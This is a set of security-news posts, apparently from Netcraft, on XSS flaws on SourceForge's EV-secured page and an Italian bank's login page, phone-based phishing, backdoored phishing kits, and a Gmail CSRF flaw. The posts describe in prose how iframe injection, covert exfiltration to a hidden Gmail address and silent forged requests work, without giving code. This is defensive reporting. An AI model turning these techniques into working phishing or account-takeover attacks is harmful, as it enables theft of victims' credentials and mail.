Extended Validation certificates and XSS considered harmful

A cross-site scripting vulnerability on the popular SourceForge.net website shows how Extended Validation SSL certificates could be exploited by fraudsters. Piggybacking on the anticipated extra trust instilled by the presence of an EV SSL certificate, arbitrary content could be injected onto the secure page at SourceForge to create a very convincing phishing attack. The green address bar displayed by the web browser would assure users that they are looking at a website that can be trusted, even though the page they are looking at may contain scripts or HTML created by a remote attacker.

ie7-resized.png
The vulnerable page at SourceForge, showing the green address bar and injected JavaScript being executed

Extended Validation SSL certificates were originally created as a direct response to the rise in internet fraud, with additional verification processes reducing the likelihood of erroneously issuing a certificate to an unauthorised party. Modern web browsers treat EV SSL certificates differently to ordinary SSL certificates, typically turning the address bar green to show that a site can be trusted. Once users are conditioned into thinking that green means good, this could prove harmful when an EV SSL site contains a cross-site scripting vulnerability.

The number of EV SSL certificates in use worldwide is still relatively small and has only recently risen above 4,000. SourceForge is a large open source software development website, with a high ranking amongst users of the Netcraft Toolbar, and uses a VeriSign Class 3 Extended Validation SSL certificate for its main secure site at https://sourceforge.net.

firefox-small.png
Nightly builds of Firefox also display the green address bar element

Both Internet Explorer 7 and recent nightly builds of the Mozilla Firefox web browser display a green address bar when accessing the vulnerable page at SourceForge, even when it is used to inject content that may have been created by a fraudster. Netcraft has informed SourceForge about this issue, although the xssed.com mirror, where this vulnerability was first discovered, suggests that it has remained unfixed since last year.

This discovery (believed to be the first documented case of XSS on an EV SSL website) highlights the need to remain wary of web application security, even when delivered with the most secure and trusted option of Extended Validation SSL certificates.

Netcraft offers extensive web application penetration and security testing services to identify vulnerabilities such as cross-site scripting.

Fraudster using phone numbers to receive authentication details

The Bank of Lancaster County is currently being targeted by a phishing attack that does away with the traditional web-based phishing forms. Instead, victims are asked to phone a toll free number to reactivate their card.

The scam is initiated by sending out phishing emails purporting that the victim's VISA card has been deactivated, stating that it may have been used in illegal activities. Rather than clicking on a hyperlink and visiting a website to resolve the problem, this phishing scam asks its victims to call a phone number based in Erie, Pennsylvania. To add credibility to the attack, the email claims that the phone number is toll free, but it is in fact not.

bankoflancaster.png

Stealing credentials via phone remains a relatively rare phishing technique. For scalability, attacks like these are usually carried out by sending emails rather than initiating phone calls, and request that the recipient calls a phone number which purportedly belongs to the bank.

Ironically, phone phishing could prove more effective due to the methods some banks use to combat fraud. Some make automated phone calls to cardholders in the event of suspicious transactions, with the cardholder being prompted to respond by entering personal details before confirming a transaction. In practice, the cardholder has no way of ascertaining that the phone call is really coming from their bank, and expecting the cardholder to trust the automated caller is effectively grooming the bank's customers into falling for phone based phishing attacks.

The Bank of Lancaster County has published an alert advising customers about fraudulent emails that contain phone numbers, which when called, ask for personal information including account passwords and credit card numbers.

Mr-Brain: Stealing Phish from Fraudsters

A recurrent group of Moroccan fraudsters calling themselves Mr-Brain has launched a website dedicated to offering easy-to-use phishing site code, email templates and other hacking tools. The website offers phishing kits for many of the most common targets, such as Bank of America, eBay, PayPal and HSBC.

The tools and code provided by Mr-Brain are designed to make it extremely easy for other fraudsters to deploy realistic phishing sites. Only a very basic knowledge of programming is required to configure the PHP scripts to send victims' details to the fraudsters' chosen electronic mail address. Deploying one of these fully working kits can be done in as little as one minute – another factor that adds to their appeal.

Tricking the Fraudsters

Mr-Brain's intentions are to encourage as many people as possible to use their phishing kits, for all is not what it seems at first glance. Careful inspection of the configuration script reveals deceptive code that hides the true set of electronic mail addresses that are contacted by the kit – every fraudster who uses these kits will unwittingly send a copy of each victim's details back to the Mr-Brain group.

scam-pages.png

The configuration script exploits the case-sensitivity in PHP variable names to disguise Mr-Brain’s electronic mail address as an unrelated but seemingly essential part of the script, encouraging fraudsters not to alter it. The injected electronic mail address is actually contained in a completely separate PHP file, where it is encrypted in a hidden input field named "niarB", or "Brain" backwards. Yet another PHP script reads the value from this input field and decrypts it before supplying it to the configuration script. Most fraudsters are unlikely to notice this level of obfuscation and will assume the script is working normally, as they will also receive a copy of any emails produced by the script.

When Netcraft decrypted the contents, the hidden input field revealed one of Mr-Brain's Gmail addresses, which is used to covertly capture details from all of the phishing kits that have been deployed on their behalf by other fraudsters. A comment at the top of one of the scripts aims to deter these fraudsters from examining the script that decrypts the hidden field:

scam-pages3.png

Earlier this month, Netcraft also exposed a similar phishing scam targeting Bank of America. This, too, was authored by Mr-Brain and was configured to covertly send harvested credentials to a different Gmail address.

scam-pages2.png

Each phishing kit listed on their website is accompanied by a description, showing what kind of information it steals from victims. One page on their website lists a selection of Social Security numbers, credit card numbers and PINs under the heading "Free and Freash [sic] Credit Card".

Mr-Brain claims that all of the scam pages offered on its site are undetected by Mozilla, Opera and Internet Explorer. Netcraft blocks these sites when they are detected by the Netcraft Toolbar community, and propagates the block to all companies which licence the Netcraft Phishing Site Feed.

Italian Bank’s XSS Opportunity Seized by Fraudsters

An extremely convincing phishing attack is using a cross-site scripting vulnerability on an Italian Bank's own website to attempt to steal customers' bank account details. Fraudsters are currently sending phishing mails which use a specially-crafted URL to inject a modified login form onto the bank's login page.

The vulnerable page is served over SSL with a bona fide SSL certificate issued to Banca Fideuram S.p.A. in Italy. Nonetheless, the fraudsters have been able to inject an IFRAME onto the login page which loads a modified login form from a web server hosted in Taiwan.

fideura.png
The fraudsters' login form presented inside the bank's SSL page.

This attack highlights the seriousness of cross-site scripting vulnerabilities on banking websites. It shows that security cannot be guaranteed just by the presence of "https" at the start of a URL, or checking that the browser address bar contains the correct domain name.

Cross-site scripting vulnerabilities on SSL sites also undermine the purpose of SSL certificates - while the attack detailed here injects external content via an IFRAME, it is important to note that a malicious payload could also be delivered solely via the vulnerable GET parameter. In the latter case, any SSL certificate associated with the site - included Extended Validation certificates - would display a padlock icon and apparently assure the user that the injected login form is genuine.

This particular attack is made all the more convincing by the vector used by the fraudsters: the URL employed by the attack injects a series of numbers directly into a JavaScript function call that already exists on the bank's LoginServlet page. This makes it difficult even for an experienced user to identify this as a cross-site scripting attack, as the URL does not look readily suspicious, with the injected content consisting only of numbers and commas.

fideura2.png
The vulnerable page, decoding arbitrary GET parameters.

In a possible attempt to bypass automated security filters, the injected content from Taiwan also contains encoded JavaScript which is used to display the text "Inserisci i tuoi codici personali" ("Insert your personal codes") and "per accedere alle aree riservate" ("To access all reserved areas"). When the modified form is submitted, the contents are transmitted to the Taiwanese server before the user is redirected to the bank's genuine, unaltered homepage.

Netcraft has contacted the bank affected by this attack and blocked the phishing site for all users of the Netcraft Toolbar, and propagated the block to the companies which licence the Netcraft PhishFeed.

Phishing kits take advantage of novice fraudsters

A phishing kit targeting the Bank of America contains an interesting insight into the intellectual hierarchy involved in Internet fraud. At first glance, the phishing kit looks attractive to any fraudster – it is straightforward to deploy on any web server that supports PHP, and a single configuration file makes it easy to specify an electronic mail address to receive captured financial details. In addition to requesting the credit card numbers and bank account details, a second form on the phishing site asks for the victim's SiteKey challenge questions and answers, which can help a fraudster gain access to the victim's Internet banking facilities.

bofa-config.png
The email address configured in the phishing kit.

However, while the phishing kit is easy to use, an encrypted component within the kit is used to send a copy of the captured details to an additional gmail address, which belongs to the author. This will not be obvious to most fraudsters using the kit, as the relevant code is detached from the configuration file and is heavily obfuscated, requiring some effort to decode.

bofa-obfuscated.png
The obfuscated code which sends a copy of the financial details to the author.

Such deception is a useful tactic for any fraudster who wishes to maximize the number of successful attacks, as the work of deploying the phishing sites and sending the mails is then carried out free of charge by novice fraudsters on behalf of the author. This relieves the author of the burden of having to carry out the more time consuming aspects of phishing – finding bulletproof web hosting, hacking into host web sites, and sending millions of phishing mails – whilst benefiting by receiving mails from each and every deployment of their own phishing kit.

bofa-screenshot.png
The phishing kit in action.

Google Fixes Gmail Cross-site Request Forgery Vulnerability

Google has fixed a vulnerability in their Gmail web based email service which would have allowed internet attackers to steal mail messages from users without being noticed.

The attack works by forcing a logged-in user to add a mail filter to their Gmail account, thereby allowing their mail to be forwarded to an external mail address controlled by the attacker. Because the Gmail service did not adequately verify the origin of such requests, it was possible for attackers to create their own web pages that used JavaScript to automatically make such requests on behalf of their victims. In essence, a Gmail user would visit one of these pages and have their account compromised without necessarily realising anything is awry. Only close inspection of the Filters tab in the Gmail Settings menu would reveal what had happened.

gmail.png

Proof of concept exploits used JavaScript to make a silent POST request to the Gmail service and add the attacker’s filter. With the results of the request hidden in an iframe, it is highly unlikely that a victim will have noticed that their Gmail account would have been compromised, particularly while they are browsing a completely different website. While this attack scenario would only be successful if the victim was logged in, many Gmail users remain constantly logged in throughout the day, thus increasing the likelihood of a successful attack.

The technique used by this exploit is known as CSRF (Cross-site Request Forgery) and is becoming an increasingly common method to attack web applications. If a web application is vulnerable to CSRF, it will allow unauthorised attackers to carry out arbitrary actions in the context of an authorised, logged in user of the application. Not only does this make a hacker’s life easier, but it also helps them to cover up their tracks, as malicious actions will appear to be carried out, unwittingly, by authorised users of the system.

Compromised webmail accounts are regarded as a valuable commodity by hackers, as they often contain information that would allow an attacker to gain unauthorised access to other systems, such as internet banking, and to harvest credit card details from online stores used by the victim. Because the attacker is now effectively in control of their victim’s email, they could also attack other accounts belonging to the victim by following “forgotten password” links and obtaining the relevant passwords via email.

Cross-site Request Forgery vulnerabilities are often difficult to identify using automated tools and typically require testing by security aware developers.